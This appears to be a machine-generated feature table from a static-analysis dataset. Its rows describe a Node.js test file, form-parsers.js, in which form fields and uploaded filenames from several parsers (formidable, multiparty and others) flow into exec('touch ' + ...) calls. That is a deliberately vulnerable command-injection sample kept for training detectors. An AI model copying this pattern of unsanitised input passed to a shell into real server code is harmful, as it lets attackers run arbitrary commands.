autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:10:41:31 | "touch ... ds.name | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:10:41:31 | "touch ... ds.name | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:10:41:31 | "touch ... ds.name | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:10:41:31 | "touch ... ds.name | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:10:41:31 | "touch ... ds.name | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:21:41:26 | fields | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:21:41:26 | fields | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:21:41:26 | fields | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:21:41:26 | fields | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:21:41:26 | fields | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:21:41:31 | fields.name | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:21:41:31 | fields.name | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:21:41:31 | fields.name | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:21:41:31 | fields.name | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:21:41:31 | fields.name | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:21:41:31 | fields.name | stringConcatenatedWith | 'touch ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:28:41:31 | name | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:28:41:31 | name | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:28:41:31 | name | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:28:41:31 | name | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:28:41:31 | name | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:5:45:14 | multiparty | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:5:45:14 | multiparty | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:5:45:14 | multiparty | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:5:45:14 | multiparty | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:5:45:38 | multipa ... party') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:5:45:38 | multipa ... party') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:5:45:38 | multipa ... party') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:5:45:38 | multiparty | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:5:45:38 | multiparty | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:5:45:38 | multiparty | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:18:45:24 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:18:45:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:18:45:24 | require | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:18:45:38 | exceptional return of require ... party') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:18:45:38 | exceptional return of require ... party') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:18:45:38 | exceptional return of require ... party') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:18:45:38 | require ... party') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:18:45:38 | require ... party') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:18:45:38 | require ... party') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:26:45:37 | 'multiparty' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:26:45:37 | 'multiparty' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:26:45:37 | 'multiparty' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:26:45:37 | 'multiparty' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:26:45:37 | 'multiparty' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:26:45:37 | 'multiparty' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:5:46:8 | http | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:5:46:8 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:5:46:8 | http | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:5:46:26 | http | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:5:46:26 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:5:46:26 | http | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:5:46:26 | http = ... 'http') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:5:46:26 | http = ... 'http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:5:46:26 | http = ... 'http') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:12:46:18 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:12:46:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:12:46:18 | require | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:12:46:26 | exceptional return of require('http') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:12:46:26 | exceptional return of require('http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:12:46:26 | exceptional return of require('http') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:12:46:26 | require('http') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:12:46:26 | require('http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:12:46:26 | require('http') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:20:46:25 | 'http' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:20:46:25 | 'http' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:20:46:25 | 'http' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:20:46:25 | 'http' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:20:46:25 | 'http' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:20:46:25 | 'http' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:48:4 | http | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:48:4 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:48:4 | http | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:48:17 | http.createServer | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:48:17 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:48:17 | http.createServer | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:2 | exceptional return of http.cr ... q);\\n\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:2 | exceptional return of http.cr ... q);\\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:2 | exceptional return of http.cr ... q);\\n\\n}) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:2 | http.cr ... q);\\n\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:2 | http.cr ... q);\\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:2 | http.cr ... q);\\n\\n}) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:9 | http.cr ... .listen | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:9 | http.cr ... .listen | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:9 | http.cr ... .listen | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:15 | exceptional return of http.cr ... n(8080) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:15 | exceptional return of http.cr ... n(8080) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:15 | exceptional return of http.cr ... n(8080) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:15 | http.cr ... n(8080) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:15 | http.cr ... n(8080) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:15 | http.cr ... n(8080) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:6:48:17 | createServer | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:6:48:17 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:6:48:17 | createServer | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:48:18 | multiparty | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:48:18 | multiparty | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:48:18 | multiparty | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:48:18 | multiparty | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:48:18 | multiparty | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:48:18 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:48:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:48:18 | this | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:48:18 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:48:18 | this | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | 'arguments' object of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | exceptional return of anonymous function | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | exceptional return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | functio ... eq);\\n\\n} | CalleeFlexibleAccessPath | http.createServer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | functio ... eq);\\n\\n} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | functio ... eq);\\n\\n} | calleeImports | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | functio ... eq);\\n\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | functio ... eq);\\n\\n} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | functio ... eq);\\n\\n} | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | functio ... eq);\\n\\n} | receiverName | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | return of anonymous function | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:19:63:1 | return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:29:48:31 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:29:48:31 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:29:48:31 | req | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:29:48:31 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:29:48:31 | req | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:29:48:31 | req | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:29:48:31 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:29:48:31 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:29:48:31 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:29:48:31 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:34:48:36 | res | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:34:48:36 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:34:48:36 | res | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:34:48:36 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:34:48:36 | res | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:10 | form | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:10 | form | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:10 | form | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:10 | form | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:10 | form | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:34 | form | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:34 | form | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:34 | form | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:34 | form | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:34 | form | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:34 | form = ... .Form() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:34 | form = ... .Form() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:34 | form = ... .Form() | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:34 | form = ... .Form() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:7:50:34 | form = ... .Form() | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:14:50:34 | exceptional return of new mul ... .Form() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:14:50:34 | exceptional return of new mul ... .Form() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:14:50:34 | exceptional return of new mul ... .Form() | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:14:50:34 | exceptional return of new mul ... .Form() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:14:50:34 | exceptional return of new mul ... .Form() | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:14:50:34 | new mul ... .Form() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:14:50:34 | new mul ... .Form() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:14:50:34 | new mul ... .Form() | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:14:50:34 | new mul ... .Form() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:14:50:34 | new mul ... .Form() | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:18:50:27 | multiparty | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:18:50:27 | multiparty | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:18:50:27 | multiparty | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:18:50:27 | multiparty | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:18:50:27 | multiparty | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:18:50:32 | multiparty.Form | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:18:50:32 | multiparty.Form | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:18:50:32 | multiparty.Form | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:18:50:32 | multiparty.Form | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:18:50:32 | multiparty.Form | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:29:50:32 | Form | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:29:50:32 | Form | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:29:50:32 | Form | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:29:50:32 | Form | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:50:29:50:32 | Form | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:52:6 | form | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:52:6 | form | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:52:6 | form | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:52:6 | form | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:52:6 | form | fileImports | busboy child_process express formidable http multer multiparty | +| 